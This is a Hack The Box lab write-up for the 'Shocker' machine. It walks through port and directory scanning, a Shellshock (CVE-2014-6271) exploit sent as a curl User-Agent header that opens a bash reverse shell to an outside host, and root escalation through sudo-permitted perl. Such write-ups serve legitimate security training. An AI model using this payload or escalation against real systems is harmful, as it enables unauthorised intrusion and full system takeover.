HTB: Shocker

Summary

Shocker is an easy Linux box that can be exploited with CVE-2014-6271. Privileges can be escalated with the perl binary which can be run with root privileges.

Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.24.92

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the webserver. The user is presented with the following:

Checked the source code with ctrl + u but found nothing relevant so I started a directory brute-force with the following command:

dirb http://10.129.24.92

This gave the following results:

---- Scanning URL: http://10.129.24.92/ ----
+ http://10.129.24.92/cgi-bin/ (CODE:403|SIZE:295)                                                                                  
+ http://10.129.24.92/index.html (CODE:200|SIZE:137)

Exploitation

The cgi-bin directory is suspicious as this, in combination with the Apache Version, indicates a possibility of the Shellshock vulnerability: CVE-2014-6271. However, to be able to exploit this you need to discover a file that you can access in this directory. To identify such a file the following command was run: dirb http://10.129.24.92/cgi-bin/ -X .sh

---- Scanning URL: http://10.129.24.92/cgi-bin/ ----
+ http://10.129.24.92/cgi-bin/user.sh (CODE:200|SIZE:119)

With this information you can open a netcat shell by issuing the following command: curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.33/9999 0>&1' http://10.129.24.92/cgi-bin/user.sh Now you can go to the home directory as usually and obtain user.txt:

shelly@Shocker:/home/shelly$ ppwwdd

/home/shelly
shelly@Shocker:/home/shelly$ ccaatt  uusseerr..ttxxtt

2ec24e11320026d1e70[...]

Privilege Escalation

To obtain root you have to run sudo -l. This will display the following:

	shelly@Shocker:/etc/selinux$ ssuuddoo  --ll

Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/etc/selinux$ 

    sudo perl -e 'exec "/bin/sh";'

If you see such entries you should always checkout this website to search for a quick privilege escalation. GTFObins says the following:

If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. sudo perl -e ’exec “/bin/sh”;'

By executing that command you obtain a root shell:

whoami
root

cd /root

ls
root.txt

cat root.txt
52c2715605d70c761[...]

Summary#

Discovery#

Exploitation#

Privilege Escalation#

Summary

Discovery

Exploitation

Privilege Escalation